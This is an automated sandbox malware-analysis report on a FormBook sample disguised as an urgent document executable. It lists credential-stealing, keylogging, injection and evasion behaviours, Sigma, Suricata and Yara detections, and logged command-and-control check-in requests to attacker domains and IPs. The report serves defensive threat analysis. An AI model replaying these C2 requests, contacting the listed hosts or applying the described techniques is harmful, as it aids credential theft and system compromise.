Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MA-DS-2024-03 URGENT.exe

Overview

General Information

Sample name:MA-DS-2024-03 URGENT.exe
Analysis ID:1572587
MD5:b5c0bc1ca5223c4b18328235497a2ef6
SHA1:23836ce6cfd0bf6617527366879bf36fcd9d3e26
SHA256:ec01b76e956bceeec02a2bf5004ec837639562729f5ea4fd61f2f9f1ea0e803f
Tags:exeuser-James_inthe_box
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • MA-DS-2024-03 URGENT.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe" MD5: B5C0BC1CA5223C4B18328235497A2EF6)
    • svchost.exe (PID: 7384 cmdline: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fbLIkXRoMf.exe (PID: 6824 cmdline: "C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • choice.exe (PID: 8188 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
          • fbLIkXRoMf.exe (PID: 564 cmdline: "C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3724 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • armsvc.exe (PID: 7316 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: A7B2833265E5E73E4BC1B1899D393D76)
  • alg.exe (PID: 7352 cmdline: C:\Windows\System32\alg.exe MD5: 114ADFAB8A4E69539FC98ABAB86561C6)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7512 cmdline: C:\Windows\system32\AppVClient.exe MD5: 70844A25E3B4375DA206E6793BBE1975)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ParentImage: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, ParentProcessId: 7252, ParentProcessName: MA-DS-2024-03 URGENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ProcessId: 7384, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ParentImage: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe, ParentProcessId: 7252, ParentProcessName: MA-DS-2024-03 URGENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe", ProcessId: 7384, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T18:00:10.940466+010028554651A Network Trojan was detected192.168.2.749817217.70.184.5080TCP
                2024-12-10T18:00:36.220714+010028554651A Network Trojan was detected192.168.2.749876154.23.184.20780TCP
                2024-12-10T18:00:52.084329+010028554651A Network Trojan was detected192.168.2.74991338.165.29.23480TCP
                2024-12-10T18:01:07.032477+010028554651A Network Trojan was detected192.168.2.74995213.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T18:00:28.160763+010028554641A Network Trojan was detected192.168.2.749857154.23.184.20780TCP
                2024-12-10T18:00:30.848420+010028554641A Network Trojan was detected192.168.2.749863154.23.184.20780TCP
                2024-12-10T18:00:33.520193+010028554641A Network Trojan was detected192.168.2.749870154.23.184.20780TCP
                2024-12-10T18:00:43.692594+010028554641A Network Trojan was detected192.168.2.74989638.165.29.23480TCP
                2024-12-10T18:00:46.368010+010028554641A Network Trojan was detected192.168.2.74990238.165.29.23480TCP
                2024-12-10T18:00:49.020270+010028554641A Network Trojan was detected192.168.2.74990838.165.29.23480TCP
                2024-12-10T18:00:58.856713+010028554641A Network Trojan was detected192.168.2.74993213.248.169.4880TCP
                2024-12-10T18:01:01.616313+010028554641A Network Trojan was detected192.168.2.74993813.248.169.4880TCP
                2024-12-10T18:01:04.487555+010028554641A Network Trojan was detected192.168.2.74994413.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-10T17:59:06.883022+010028508511Malware Command and Control Activity Detected192.168.2.74969954.244.188.17780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: MA-DS-2024-03 URGENT.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\AppVClient.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
                Multi AV Scanner detection for submitted file
                Source: MA-DS-2024-03 URGENT.exeReversingLabs: Detection: 81%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1775163811.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504438586.0000000004250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2499870551.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2505900550.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1774789087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1775699573.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2504146589.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2504310648.0000000004220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\AppVClient.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: MA-DS-2024-03 URGENT.exeJoe Sandbox ML: detected
                Source: MA-DS-2024-03 URGENT.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1253573729.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
                Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: DiagnosticsHub.StandardCollector.Service.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fbLIkXRoMf.exe, 00000010.00000000.1675751246.000000000003E000.00000002.00000001.01000000.00000005.sdmp, fbLIkXRoMf.exe, 00000012.00000002.2499888410.000000000003E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1261605292.0000000004220000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1262757269.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, MA-DS-2024-03 URGENT.exe, 00000000.00000003.1264514250.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1657811833.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1775206519.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1660023534.0000000003500000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1775134719.0000000004152000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.000000000464E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000011.00000003.1777431528.0000000004305000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000011.00000002.2504660068.00000000044B0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: MA-DS-2024-03 URGENT.exe, 00000000.00000003.1257659688.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 00000004.00000003.1742846081.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1742827703.000000000301A000.00000004.00000020.00020000.00000000.sdmp, fbLIkXRoMf.exe, 00000010.00000002.2502923981.00000000011B8000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                barindex
                Infects executable files (exe, dll, sys, html)
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49699 -> 54.244.188.177:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49817 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49857 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49863 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49870 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49876 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49896 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49908 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49913 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49902 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49932 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49938 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49944 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49952 -> 13.248.169.48:80
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 54.244.188.177 54.244.188.177
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
                Source: global trafficHTTP traffic detected: GET /px6j/?PNE=e0RPRf4HVNE&66Sxjp=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1Host: www.sunnyz.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ffw/?66Sxjp=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/fS/App7EdCeX7snBTGyVcR6uHi6nECuo9X1MxomcvUl4vhP9y31uTQC7&PNE=e0RPRf4HVNE HTTP/1.1Host: www.d48dk.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d3gs/?66Sxjp=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALd9I9cQRWlWRfEGaG8Rwz/2lSBqGTy2oz+0b8ie3FY95QYv/bX6Bmf7b1&PNE=e0RPRf4HVNE HTTP/1.1Host: www.8312zcksnu.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4nyz/?66Sxjp=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLfAVgne3fDPNZyA8jfWq2da7UT45q0fw1b8SX8H1e/LnrcRFlX9om2hRo&PNE=e0RPRf4HVNE HTTP/1.1Host: www.snyp.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                Source: global trafficDNS traffic detected: DNS query: www.sunnyz.store
                Source: global trafficDNS traffic detected: DNS query: www.d48dk.top
                Source: global trafficDNS traffic detected: DNS query: www.8312zcksnu.bond
                Source: global trafficDNS traffic detected: DNS query: www.snyp.shop
                Source: unknownHTTP traffic detected: POST /usxsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 830
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 17:00:27 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 17:00:33 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66927002-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
